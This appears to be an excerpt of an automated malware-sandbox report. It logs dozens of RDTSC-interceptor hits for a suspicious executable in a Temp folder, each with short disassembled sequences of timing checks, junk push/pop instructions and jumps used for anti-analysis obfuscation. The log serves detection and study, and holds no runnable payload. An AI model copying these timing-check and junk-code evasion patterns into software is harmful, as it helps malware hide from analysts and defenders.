                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BE0AC3 second address: 4BE0B33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C5275Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ax, di 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 mov ecx, edi 0x00000013 popad 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F29F0C5275Ch 0x0000001f or ax, 03C8h 0x00000024 jmp 00007F29F0C5275Bh 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007F29F0C52768h 0x00000030 jmp 00007F29F0C52765h 0x00000035 popfd 0x00000036 popad 0x00000037 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BE0B33 second address: 4BE0B39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BE0B39 second address: 4BE0B3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C308AF second address: 4C308B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C308B5 second address: 4C308F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F29F0C5275Ch 0x00000009 jmp 00007F29F0C52765h 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 xchg eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov di, 6F7Ah 0x0000001a jmp 00007F29F0C5275Bh 0x0000001f popad 0x00000020 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C308F2 second address: 4C3093F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 pushfd 0x00000007 jmp 00007F29F0CD529Bh 0x0000000c add ax, 67CEh 0x00000011 jmp 00007F29F0CD52A9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b jmp 00007F29F0CD52A1h 0x00000020 xchg eax, ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C3093F second address: 4C30943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C30943 second address: 4C30956 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD529Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C30956 second address: 4C3095C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C3095C second address: 4C3096C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C3096C second address: 4C30970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C30970 second address: 4C30988 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C30988 second address: 4C309BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 call 00007F29F0C5275Dh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebp 0x0000000f pushad 0x00000010 mov ch, dl 0x00000012 call 00007F29F0C52766h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C307F2 second address: 4C30826 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, di 0x00000006 call 00007F29F0CD52A1h 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 mov ecx, 6E856563h 0x00000016 push eax 0x00000017 pushad 0x00000018 popad 0x00000019 pop edi 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f movsx edi, cx 0x00000022 mov ecx, 11FEA745h 0x00000027 popad 0x00000028 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C30826 second address: 4C3082B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C3082B second address: 4C30868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29F0CD52A7h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e jmp 00007F29F0CD52A6h 0x00000013 pop ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C30868 second address: 4C3086C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C3086C second address: 4C30889 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C306B2 second address: 4C306C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29F0C5275Ch 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C306C2 second address: 4C30718 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD529Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e jmp 00007F29F0CD52A6h 0x00000013 mov ebp, esp 0x00000015 jmp 00007F29F0CD52A0h 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F29F0CD52A7h 0x00000022 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BF0CAB second address: 4BF0CB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BF0CB0 second address: 4BF0CBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29F0CD529Bh 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BF0CBF second address: 4BF0D1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C52769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F29F0C52761h 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F29F0C5275Eh 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F29F0C52767h 0x00000020 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BF0D1A second address: 4BF0D20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BF0D20 second address: 4BF0D24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BF0D24 second address: 4BF0D28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BF0D28 second address: 4BF0D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F29F0C5275Ah 0x00000010 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BF0D3D second address: 4BF0D43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BF0D43 second address: 4BF0D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C30CBA second address: 4C30CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C30CBE second address: 4C30CC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C30CC4 second address: 4C30D33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F29F0CD52A1h 0x00000011 adc si, E256h 0x00000016 jmp 00007F29F0CD52A1h 0x0000001b popfd 0x0000001c mov ecx, 07480FC7h 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 jmp 00007F29F0CD529Ah 0x00000028 mov ebp, esp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F29F0CD52A7h 0x00000031 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C30D33 second address: 4C30D59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F29F0C52768h 0x00000013 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C30D59 second address: 4C30D71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 mov ebx, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and dword ptr [eax], 00000000h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov di, 3314h 0x00000015 push edx 0x00000016 pop ecx 0x00000017 popad 0x00000018 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C30D71 second address: 4C30D9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C52766h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax+04h], 00000000h 0x0000000d pushad 0x0000000e mov di, si 0x00000011 mov bh, ah 0x00000013 popad 0x00000014 pop ebp 0x00000015 pushad 0x00000016 mov cx, bx 0x00000019 push eax 0x0000001a push edx 0x0000001b push ebx 0x0000001c pop esi 0x0000001d rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BE09B2 second address: 4BE09B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, edx 0x00000006 popad 0x00000007 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BE09B9 second address: 4BE0A0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C52762h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c jmp 00007F29F0C5275Dh 0x00000011 pop eax 0x00000012 pushad 0x00000013 jmp 00007F29F0C52767h 0x00000018 push ecx 0x00000019 pop ebx 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F29F0C52760h 0x00000024 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C30150 second address: 4C30182 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD529Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F29F0CD529Eh 0x00000013 xor ch, FFFFFF98h 0x00000016 jmp 00007F29F0CD529Bh 0x0000001b popfd 0x0000001c popad 0x0000001d rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C10BAC second address: 4C10BCA instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push ecx 0x00000009 jmp 00007F29F0C5275Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C10BCA second address: 4C10BCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C10BCE second address: 4C10BEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C52769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C10BEB second address: 4C10C1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F29F0CD52A2h 0x00000010 mov eax, dword ptr [ebp+08h] 0x00000013 pushad 0x00000014 call 00007F29F0CD529Eh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4C10C1C second address: 4C10C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov ebx, 2EAF4134h 0x0000000a popad 0x0000000b and dword ptr [eax], 00000000h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4C10C30 second address: 4C10C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4C10C34 second address: 4C10C48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C52760h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4C10C48 second address: 4C10C5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29F0CD529Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4C10C5A second address: 4C10C5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4BC01BC second address: 4BC01C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4BC01C1 second address: 4BC01C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4BC01C7 second address: 4BC01CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4BC01CB second address: 4BC0205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F29F0C5275Ah 0x0000000e mov ebp, esp 0x00000010 jmp 00007F29F0C52760h 0x00000015 and esp, FFFFFFF8h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b call 00007F29F0C5275Dh 0x00000020 pop eax 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4BC0205 second address: 4BC024A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 mov dl, FDh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F29F0CD52A3h 0x00000014 sbb cx, 47AEh 0x00000019 jmp 00007F29F0CD52A9h 0x0000001e popfd 0x0000001f movzx eax, dx 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4BC024A second address: 4BC0250 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4BC0250 second address: 4BC0254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4BC0254 second address: 4BC0295 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov bh, FFh 0x0000000c mov si, 2C79h 0x00000010 popad 0x00000011 xchg eax, ecx 0x00000012 pushad 0x00000013 mov ecx, 3950F1B1h 0x00000018 jmp 00007F29F0C5275Eh 0x0000001d popad 0x0000001e xchg eax, ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F29F0C52767h 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4BC0295 second address: 4BC02DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F29F0CD52A1h 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F29F0CD52A3h 0x00000018 mov edi, esi 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4BC041F second address: 4BC0477 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F29F0C52761h 0x00000009 adc si, D1C6h 0x0000000e jmp 00007F29F0C52761h 0x00000013 popfd 0x00000014 jmp 00007F29F0C52760h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, edi 0x0000001d jmp 00007F29F0C52760h 0x00000022 test esi, esi 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4BC0477 second address: 4BC0494 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4BC0494 second address: 4BC04EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 jmp 00007F29F0C52763h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e je 00007F2A638108BBh 0x00000014 jmp 00007F29F0C52766h 0x00000019 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000020 jmp 00007F29F0C52760h 0x00000025 je 00007F2A6381089Eh 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4BC04EF second address: 4BC04F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4BC04F3 second address: 4BC0510 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C52769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4BC0510 second address: 4BC0566 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 pushfd 0x00000006 jmp 00007F29F0CD52A3h 0x0000000b sbb ecx, 70E603DEh 0x00000011 jmp 00007F29F0CD52A9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov edx, dword ptr [esi+44h] 0x0000001d jmp 00007F29F0CD529Eh 0x00000022 or edx, dword ptr [ebp+0Ch] 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4BC0566 second address: 4BC056A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4BC056A second address: 4BC0587 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4BC0587 second address: 4BC05B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C52761h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f pushad 0x00000010 movzx esi, dx 0x00000013 movsx edx, ax 0x00000016 popad 0x00000017 jne 00007F2A63810834h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov ch, 26h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4BC05B6 second address: 4BC0612 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F29F0CD52A0h 0x00000009 jmp 00007F29F0CD52A5h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007F29F0CD52A0h 0x00000015 or si, 3558h 0x0000001a jmp 00007F29F0CD529Bh 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 test byte ptr [esi+48h], 00000001h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a mov dx, 6246h 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
